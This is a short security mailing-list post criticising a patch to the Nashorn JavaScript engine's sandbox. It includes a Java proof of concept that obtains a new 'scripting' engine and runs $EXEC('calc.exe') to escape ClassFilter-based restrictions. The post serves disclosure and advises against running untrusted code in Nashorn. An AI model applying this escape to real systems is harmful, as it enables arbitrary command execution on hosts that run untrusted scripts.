Hi,
interesting that they "fixed" this issue now. Way back, when reporting
something similar (<https://mbechler.github.io/2019/03/02/Beware-the-Nashorn/>),
I was told that Nashorn "sandboxing" was not supposed
to be secure unless you also configure a SecurityManager (which
implicitly suppresses the "engine" property). Restrictions purely based
on a ClassFilter have been broken ever since then.
And the patch really does not address the fundamental issue, which is
that you are able to get and configure a new engine. While the change
may stop you from suppressing the inherited no-java flag, why not get
direct command execution using another option instead:

    System.setProperty("nashorn.args", "--no-java");
    ScriptEngine e = new ScriptEngineManager().getEngineByName("nashorn");
    String cmd =
        "this.engine.factory.getScriptEngine(\"scripting\").eval('$EXEC(\"calc.exe\")')";
    e.eval(cmd);

So, imho, the proper advice still should be not to use Nashorn for
running untrusted code.
best regards
Moritz